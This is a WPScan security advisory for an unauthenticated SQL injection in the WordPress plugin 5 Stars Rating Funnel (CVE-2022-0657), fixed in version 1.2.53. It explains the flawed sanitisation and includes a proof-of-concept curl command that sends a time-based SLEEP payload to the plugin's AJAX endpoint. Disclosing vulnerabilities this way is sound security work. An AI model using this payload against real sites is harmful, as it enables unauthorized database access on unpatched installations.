WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

5 Stars Rating Funnel < 1.2.53 - Unauthenticated SQLi

Description

The plugin does not properly sanitise, validate and escape lead ids before using them in a SQL statement via the rrtngg_delete_leads AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue. There is an attempt to sanitise the input, using sanitize_text_field(), however such function is not intended to prevent SQL injections.

Proof of Concept

Create a new funnel (All Rating Funnels sub-menu)
Create a new lead (Leads / Feedbacks sub-menu)
Invoke the following curl command to trigger a 5 second sleep

curl https://example.com/wp-admin/admin-ajax.php --data 'action=rrtngg_delete_leads&lead_ids[]=(SELECT SLEEP(5))) AND 1=1 #'

Affects Plugins

5-stars-rating-funnel
Fixed in version 1.2.53

References

CVE
CVE-2022-0657

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
e7fe8218-4ef5-4ef9-9850-8567c207e8e6

Timeline

Publicly Published

2022-03-29 (about 3 months ago)

Added

2022-03-29 (about 3 months ago)

Last Updated

2022-04-13 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin